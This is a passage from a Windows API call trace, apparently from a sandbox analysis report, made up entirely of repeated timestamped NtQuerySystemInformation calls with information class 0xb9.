(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0273.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0273.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7c0, Length=0x28, ResultLength=0x0) [0273.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x38, ResultLength=0x0) [0273.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x28, ResultLength=0x0) [0273.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x28, ResultLength=0x0) [0273.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x38, ResultLength=0x0) [0273.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x20, ResultLength=0x0) [0273.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0273.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0273.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0273.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x38, ResultLength=0x0) [0273.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x20, ResultLength=0x0) [0273.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0273.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0273.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca08, Length=0x58, ResultLength=0x0) [0273.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0273.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x28, ResultLength=0x0) [0273.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x28, ResultLength=0x0) [0273.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x28, ResultLength=0x0) [0273.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x28, ResultLength=0x0) [0273.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x28, ResultLength=0x0) [0273.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0273.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0273.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x28, ResultLength=0x0) [0273.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x28, ResultLength=0x0) [0273.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0273.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0273.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x20, ResultLength=0x0) [0273.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0273.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0273.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0273.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x20, ResultLength=0x0) [0273.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0273.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x20, ResultLength=0x0) [0273.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0273.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0273.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0273.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0273.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x20, ResultLength=0x0) [0273.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0273.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0273.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0273.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0273.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x20, ResultLength=0x0) [0273.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x20, ResultLength=0x0) [0273.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x20, ResultLength=0x0) [0273.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca08, Length=0x58, ResultLength=0x0) [0273.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x58, ResultLength=0x0) [0273.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0273.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0273.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0273.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0273.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0273.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x28, ResultLength=0x0) [0273.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0273.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0273.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0273.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0273.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x20, ResultLength=0x0) [0273.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x20, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x58, ResultLength=0x0) [0273.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0273.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0273.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0273.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0273.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0273.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x28, ResultLength=0x0) [0273.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0273.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0273.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0273.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0273.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0273.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0273.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0273.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0273.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0273.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x20, ResultLength=0x0) [0273.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0273.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0273.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x58, ResultLength=0x0) [0273.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 